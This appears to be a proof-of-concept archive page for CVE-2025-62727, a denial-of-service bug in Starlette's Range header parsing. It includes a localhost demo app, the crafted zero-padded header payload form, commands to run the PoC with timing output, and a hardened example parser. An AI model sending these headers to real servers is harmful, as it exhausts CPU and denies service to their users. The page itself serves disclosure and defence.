Related vulnerability
Title:
Starlette security vulnerability
(CVE-2025-62727)
Description: Starlette is a lightweight ASGI framework/toolkit open-sourced by Encode, well suited to building asynchronous web services in Python. Starlette versions before 0.49.1 contain a security vulnerability: the merge logic in the FileResponse Range parser has quadratic-time behaviour, which can lead to CPU exhaustion and denial of service.
Description
Proof of concept for CVE-2025-62727, which can cause denial of service in FastAPI (based on Starlette <= 0.48.0)
Introduction
# CVE-2025-62727 Demo
## Victim Description
The target victim of CVE-2025-62727 is a simple FastAPI app that:
- Serves `Hello World` at `/`.
- Serves static files under `/static` using Starlette's `StaticFiles`.
- Auto-generates text files containing `A` repeated N times for N in `1024, 2048, 50176` on startup.
## How to run victim
1. (Optional) Create and activate a virtualenv.
2. Install dependencies:
```bash
pip install -r requirements.txt
```
3. Start the server:
```bash
uvicorn main:app --reload
```
4. Open:
- `http://127.0.0.1:8000/` for the index page.
- `http://127.0.0.1:8000/static/1024.txt` etc. for static files.
## Notes
- Static files are generated under the `static/` directory on app startup. Existing files are not overwritten.
- Static serving uses Starlette's `StaticFiles` as requested.
## PoC: CVE-2025-62727 (Range header parsing)
The included `poc.py` triggers CPU-heavy Range parsing in Starlette's `FileResponse` via the `/static` route using a crafted header of the form `bytes=000...000a-`.
Run the server, then in another shell:
```bash
python3 poc.py --sizes 1000,2000,4000,7000
```
Override the target URL (optional):
```bash
python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
```
Notes:
- The PoC targets `http://127.0.0.1:8000/static/50176.txt` by default (a file the app generates). Use `--url` to change it.
- Adjust `--sizes` downward if you see 400/431 (header too large), or upward if headers succeed and you want a stronger effect.
Result example:
```bash
$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
```
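The hardening pattern for the bug class exercised above, as an added example (not code from this repository or from Starlette's patch): every step of Range handling is bounded before any work is done. The header length, the number of range specs and the digit run per byte position are capped (the cap values are assumptions), and overlapping ranges are merged with a sort-and-sweep pass rather than pairwise comparison, so a padded `bytes=000...000a-` header is refused in constant time.

```python
from typing import List, Tuple
# Assumed caps for this example (not Starlette's values): bound the work before parsing.
MAX_RANGE_HEADER_LEN = 256   # the PoC's 10 000+ byte headers are refused here
MAX_RANGES = 16              # range specs per request
MAX_DIGITS = 20              # any 64-bit offset fits; rejects zero-padded digit runs

class RangeError(ValueError):
    """Answer with 400/416 and do no further work."""

def parse_range_header(value: str, file_size: int) -> List[Tuple[int, int]]:
    """Merged, sorted inclusive (start, end) pairs; O(len(value) + k log k) overall."""
    if len(value) > MAX_RANGE_HEADER_LEN or not value.startswith("bytes="):
        raise RangeError("oversized or non-bytes Range header")
    specs = value[len("bytes="):].split(",")
    if len(specs) > MAX_RANGES:
        raise RangeError("too many ranges")
    ranges: List[Tuple[int, int]] = []
    for spec in specs:
        parts = spec.strip().split("-")
        # Exactly one '-', and each present position is a short ASCII digit run.
        if len(parts) != 2 or not all(
            len(p) <= MAX_DIGITS and p.isascii() and p.isdigit() for p in parts if p
        ):
            raise RangeError("malformed range spec")
        start = int(parts[0]) if parts[0] else None
        end = int(parts[1]) if parts[1] else None
        if start is None:                        # suffix form "-N": the last N bytes
            if end is None:
                raise RangeError("empty range spec")
            start, end = max(file_size - end, 0), file_size - 1
        else:
            end = file_size - 1 if end is None else min(end, file_size - 1)
        if start > end:
            raise RangeError("unsatisfiable range")  # HTTP 416
        ranges.append((start, end))
    ranges.sort()                                # sort-and-sweep: one linear merge pass
    merged = [ranges[0]]
    for start, end in ranges[1:]:
        if start <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged

def rejects(value: str, file_size: int) -> bool:
    try:
        parse_range_header(value, file_size)
        return False
    except RangeError:
        return True
```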
File snapshot
```
[4.0K] /data/pocs/fdc453a0dbc2d3a8be65621421d230cb4ae1fca3
├── [2.1K] main.py
├── [2.3K] poc.py
├── [2.0K] README.md
├── [ 431] requirements.txt
└── [4.0K] static
    ├── [ 10K] 10240.txt
    ├── [1.0K] 1024.txt
    ├── [ 11K] 11264.txt
    ├── [ 12K] 12288.txt
    ├── [ 13K] 13312.txt
    ├── [ 14K] 14336.txt
    ├── [ 15K] 15360.txt
    ├── [ 16K] 16384.txt
    ├── [ 17K] 17408.txt
    ├── [ 18K] 18432.txt
    ├── [ 19K] 19456.txt
    ├── [ 20K] 20480.txt
    ├── [2.0K] 2048.txt
    ├── [ 21K] 21504.txt
    ├── [ 22K] 22528.txt
    ├── [ 23K] 23552.txt
    ├── [ 24K] 24576.txt
    ├── [ 25K] 25600.txt
    ├── [ 26K] 26624.txt
    ├── [ 27K] 27648.txt
    ├── [ 28K] 28672.txt
    ├── [ 29K] 29696.txt
    ├── [ 30K] 30720.txt
    ├── [3.0K] 3072.txt
    ├── [ 31K] 31744.txt
    ├── [ 32K] 32768.txt
    ├── [ 33K] 33792.txt
    ├── [ 34K] 34816.txt
    ├── [ 35K] 35840.txt
    ├── [ 36K] 36864.txt
    ├── [ 37K] 37888.txt
    ├── [ 38K] 38912.txt
    ├── [ 39K] 39936.txt
    ├── [ 40K] 40960.txt
    ├── [4.0K] 4096.txt
    ├── [ 41K] 41984.txt
    ├── [ 42K] 43008.txt
    ├── [ 43K] 44032.txt
    ├── [ 44K] 45056.txt
    ├── [ 45K] 46080.txt
    ├── [ 46K] 47104.txt
    ├── [ 47K] 48128.txt
    ├── [ 48K] 49152.txt
    ├── [ 49K] 50176.txt
    ├── [5.0K] 5120.txt
    ├── [6.0K] 6144.txt
    ├── [7.0K] 7168.txt
    ├── [8.0K] 8192.txt
    └── [9.0K] 9216.txt

1 directory, 53 files
```
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source has become unavailable or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.